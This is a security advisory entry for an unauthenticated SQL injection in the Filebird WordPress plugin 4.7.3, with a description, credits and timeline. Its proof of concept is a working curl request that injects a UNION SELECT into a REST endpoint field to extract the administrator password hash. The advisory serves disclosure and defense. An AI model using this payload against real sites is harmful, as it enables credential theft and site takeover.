WordPress Plugin Vulnerabilities
Filebird 4.7.3 - Unauthenticated SQL Injection
Description
The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user.
Proof of Concept
curl 'https://example.com/wp-json/filebird/v1/gutenberg-get-images?_locale=user' \
-H 'accept: application/json, */*;q=0.1' \
-H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'content-type: application/json' \
--data-raw '{"isLoading":false,"captions":{},"imagesRemoved":[],"images":[],"selectedFolder":["1) UNION (SELECT user_pass FROM wp_users WHERE ID=1"],"columns":3,"isCropped":true,"hasCaption":false,"linkTo":"none","sortBy":"date","sortType":"DESC","animation":"none","animationEasing":"linear","animationDelay":0,"animationDuration":400,"folders":[{"value":0,"label":"Please choose folder","disabled":true}]}' \
--compressed Affects Plugins
Fixed in version 4.7.4
References
Classification
Miscellaneous
Original Researcher
Ravi Chandra (10up)
Submitter
Ravi Chandra (10up)
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-06-16 (about 11 months ago)
Added
2021-06-17 (about 11 months ago)
Last Updated
2021-06-25 (about 10 months ago)